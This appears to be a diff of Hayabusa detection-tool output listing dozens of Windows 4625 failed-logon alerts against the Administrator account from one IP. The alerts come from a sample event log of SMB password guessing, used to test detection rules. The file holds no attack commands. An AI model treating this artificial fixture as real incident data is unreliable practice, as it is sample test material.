+2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xkig4u0LIS9v3HMK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 94RbUrUcMf6VhP8A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X9f7wCJ3wI9RmZTL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LkVs1viGo4RxhFaY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OKMLt6t01vUDDq1s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xYSif8ADOkC8aInB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EpmraSe2sxFVupTy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VPtfy3AxXpt9D3bx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tRMOrE0Ba983q0Jv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jQ0nkyTAeJt3dCpx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n2fdsRMU9SMm1KpL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3kliEPBsbsYNI7yG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9gEKFGsRvvlzulxR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5M6oUbT8LvS7JNCq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E4dxHwRQVR7iBWa1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VRygirU257VfFcR5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6H6i0wkjvWkU6cmp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W4Nh7bYfVvx30hVF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GQEsO4GpVjO5xpRh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c9ZlpSBwq0tLAgzm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 65Piip53B1AiSBqb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bh7SfuheoykW7Aym  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tWdm76C4nL6tkU0Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u2WEqTrg3A760Axt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oyqhXspTlWwVCwA3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4rkidbQJmvQr35Jg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zr92VsL1YgHVehnL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rQP1K9rHrOyL0TOc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LR783q3o34oLQLTI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6NCTNhcghRGWf1qi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CVJdStLdKDbUICyB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: luAoVhEj1rOgZBfp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OrqmovxoEEjLCaYV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AIP4mDSVhM27IAIP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cym5lXDK01XuJz2b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7pYXA1Ic6BOfG31o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b722QrTSVoZGfiK8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NzRFz4L7dpar794B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pLWuw9eMN9rqm0Ic  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sE7pzfiKRfOb2dH5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YxL1cV8OiFVRfj4I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qHs8Z8XPLg58jZ1u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i6kRLlJt3Oxwhdgq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s4kTwriHAKVsTqzB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jfitpZ5ZrzBfpNf6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NdcU6ypEEeIAugGI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jIMfGIU1pHasO88g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MHsxKEQK7CWSqprp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QkC70klP6mv8YZrN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v3YM3zaZk64qqq7K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mOLbk23zOqQLZYZU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v0tlyXqvCQJVqaB5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: npjQlHcGls5gENng  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7buinUqketmW3Ib6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Rs5gYGs6JBf2yV1J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 67hYMvtmbrmv5LHn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gtV42zBnWwRCLfJS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jnaPNm28FvbFfM8L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oCEvKO14gPFHAZIA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iJJyXCm1YOI2uIAS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MNAScx4qMKxCJQdU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BKTHsNA29ZnPHCHQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CjvAb3sjN0PM8my4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wYQ6HuRSMh8DXzMf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SZgejUxgojDE1kR3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2L4yO411OUnkRGWQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O3mGCNGFML75P7w4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6CBslPz31UACz0wR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F4Y8V0wB6unpmFXA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aXSbx81GD6dYgHtv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dWbnppJfJ0Ll9oLW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eoUjizV5iXImPGTe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
